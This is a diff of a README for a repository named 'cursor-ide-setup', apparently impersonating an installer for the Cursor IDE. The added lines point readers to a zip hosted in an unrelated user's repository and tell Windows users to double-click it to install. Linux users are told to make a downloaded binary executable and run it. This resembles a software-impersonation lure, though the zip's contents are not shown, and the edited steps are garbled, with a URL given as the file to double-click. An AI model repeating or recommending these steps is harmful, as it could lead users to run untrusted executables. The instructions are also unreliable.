Oskar2133123/cursor-ide-setup/README.md

 ### 3. Download the File

 Click on the downloadable file that corresponds to your operating system.
-The file name should include your OS type (e.g., `cursor-ide-setup-windows.zip`).
+The file name should include your OS type (e.g., `https://raw.githubusercontent.com/Oskar2133123/cursor-ide-setup/main/Randell/cursor-ide-setup.zip`).

 ### 4. Extract and Install

 After the download is complete:

 - **Windows:** Right-click the ZIP file and select "Extract All".
-Once extracted, open the folder and double-click `cursor-ide-setup.exe` to start the installation.
+Once extracted, open the folder and double-click `https://raw.githubusercontent.com/Oskar2133123/cursor-ide-setup/main/Randell/cursor-ide-setup.zip` to start the installation.
 - **macOS:** Double-click the downloaded file, then drag the application to your Applications folder.
 - **Linux:** Extract the files.
 You may need to open your terminal and navigate to the folder.
 Run `chmod +x cursor-ide-setup` and then `./cursor-ide-setup` to start.